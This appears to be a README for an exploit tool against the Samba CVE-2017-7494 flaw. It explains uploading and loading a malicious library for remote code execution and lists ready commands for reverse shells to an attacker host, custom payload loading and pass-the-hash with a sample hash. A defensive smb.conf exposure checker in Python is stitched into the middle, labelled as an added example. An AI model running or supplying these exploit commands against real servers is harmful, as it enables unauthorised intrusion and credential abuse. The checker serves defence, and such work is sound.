Remote exploit for the Samba CVE-2017-7494 vulnerability, aka is_known_pipename!
This exploit is divided into 3 parts:
- Compiles evilLib for one of the following archs: x86_64, x86 or i686
- Finds a writeable share and uploads evilLib to it!
- Loads evilLib; if everything goes right, RCE!
As long as the target is vulnerable and the payload is correct for the target operating system and architecture, the exploit is quite reliable.
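For defenders, the two conditions the three steps above depend on (a share the client can write to, and a server that still accepts a pipe-open request whose name is a path on disk) can be checked from the server side. The Python below is an added example, not code from noSAMBAnoCRY or from Samba: it parses a constructed smb.conf, lists the shares that end up writable after Samba's `read only` / `writable` synonym and [global] inheritance rules, checks for the `nt pipe support = no` workaround from the Samba advisory, and flags pipe names that contain a `/`, which is what the upstream fix to is_known_pipename rejects. All function names and the sample configuration are my own.

```python
"""Server-side checks for the preconditions of CVE-2017-7494 (added example)."""
import re
from typing import Dict, List

# Constructed sample smb.conf (not taken from the page): two writable shares,
# one read-only share, and the workaround present only as a comment.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = file server
   ; nt pipe support = no

[public]
   path = /srv/samba/public
   guest ok = yes
   read only = no

[docs]
   path = /srv/samba/docs
   writable = yes

[archive]
   path = /srv/samba/archive
   read only = yes
"""

_TRUE = {"yes", "true", "1"}


def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal smb.conf parser: [section] headers, 'key = value' lines and
    '#'/';' comments. Keys are lowercased with spaces removed, since Samba
    treats 'read only' and 'readonly' as the same parameter."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1).strip().lower()
            sections[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        key = key.strip().lower().replace(" ", "")
        value = value.strip().lower()
        # Fold the inverse synonyms of 'read only' into one canonical key so the
        # last occurrence in a section wins, as it does in Samba itself.
        if key in ("writable", "writeable", "writeok"):
            key, value = "readonly", ("no" if value in _TRUE else "yes")
        sections[current][key] = value
    return sections


def writable_shares(conf: Dict[str, Dict[str, str]]) -> List[str]:
    """Shares that are writable once [global] inheritance and Samba's default
    of 'read only = yes' are applied."""
    default_ro = conf.get("global", {}).get("readonly", "yes")
    return [name for name, params in conf.items()
            if name != "global" and params.get("readonly", default_ro) not in _TRUE]


def nt_pipe_support_disabled(conf: Dict[str, Dict[str, str]]) -> bool:
    """True when the advisory workaround 'nt pipe support = no' is set in [global]."""
    return conf.get("global", {}).get("ntpipesupport") == "no"


def pipe_name_is_suspicious(pipe_name: str) -> bool:
    """A legitimate RPC pipe name is a bare identifier such as 'srvsvc'; the
    upstream fix rejects any name containing '/', so such a name in a
    pipe-open request is worth alerting on."""
    return "/" in pipe_name


def cve_2017_7494_exposure(conf: Dict[str, Dict[str, str]]) -> Dict[str, object]:
    """Summarise whether this configuration still offers both preconditions."""
    shares = writable_shares(conf)
    return {
        "writable_shares": shares,
        "nt_pipe_support_disabled": nt_pipe_support_disabled(conf),
        "exposed": bool(shares) and not nt_pipe_support_disabled(conf),
    }


if __name__ == "__main__":
    print(cve_2017_7494_exposure(parse_smb_conf(SAMPLE_SMB_CONF)))
```

The `exposed` flag only says the configuration still satisfies the exploit's preconditions; patching Samba is the real fix, and `nt pipe support = no` is a blunt workaround that also breaks legitimate RPC pipes (Windows clients in particular), so use it only until the upgrade is done.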
Run the exploit against your target and wait until shell spawns:
$ python noSAMBAnoCRY.py -r RHOST
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort
For Samba versions 3.5.0 up to 3.6.0, you just need to add the argument -o 1:
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1
Run your own custom .so
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so
For a custom Samba port, use the argument -p:
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port
In case you bump into smbpasswd hashes and cannot crack them, you can pass-the-hash using the argument --hashes=LM:NT:
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP
This repo is inspired by joxeankoret/exploit-CVE-2017-7494 and Archivaldo.